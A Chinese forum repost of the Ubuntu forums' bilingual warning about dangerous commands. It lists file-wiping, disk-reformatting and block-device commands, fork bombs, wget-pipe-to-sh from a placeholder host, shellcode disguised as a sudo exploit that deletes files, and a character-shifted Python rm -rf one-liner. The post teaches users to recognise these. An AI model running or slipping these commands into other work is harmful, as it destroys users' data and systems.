24小时热门版块排行榜

返回列表

当前主题已经存档。

dnp

荣誉版主 (知名作家)

小木虫浪子

应助: 74 (初中生)
贵宾: 18.476
金币: 18825.9
散金: 2040
红花: 77
沙发: 6
帖子: 7319
在线: 598.4小时
虫号: 437184
注册: 2007-08-26
性别: GG
专业: 生物信息学
管辖: 有机交流

[交流] [转贴]请不要执行如下类似命令--Ubuntu危险命令

最近ubuntu官方论坛发出了官方通告, 列出下列危险命令, 告诫用户不要执行, 并对随意张贴下列命令的帐号处以直接封号的处罚.

再次声明, 请不要执行下列或类似下列的命令, 这些命令将会对你的计算机造成严重影响.

请不要以什么给普通用户教训来提高他们的安全意识等等托词来为自己不怀好意的行为作为借口!

http://ubuntuforums.org/announcement.php?a=54

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
下列命令会删除所有文件, 删除当前目录, 删除当前目录下面的文件.

代码:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
下列命令会摧毁整个文件系统, 重建分区.

代码:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
下列命令会清空整个硬盘.

代码:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
下列命令会启动大量进程, 导致系统无法响应, 只能硬重启机器, 可能会导致数据损害.

代码:

){:|:&};:

In Perl

代码:
fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
不要执行你不信任的人提供的shell脚本, 里面可能含有危险的命令和脚本, 不要随意解压别人提供的压缩包, 也许看起来很小, 结果解压出来会塞满整个硬盘.

代码:

wget http://some_place/some_file
sh ./some_file

代码:
wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

不要编译运行别人提供的不明代码

代码:
char esp[] __attribute__ ((section(".text"

)) /* e.s.p
release */
            = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
               "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
               "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
               "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
               "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
               "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
               "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
               "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:

代码:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

回复此楼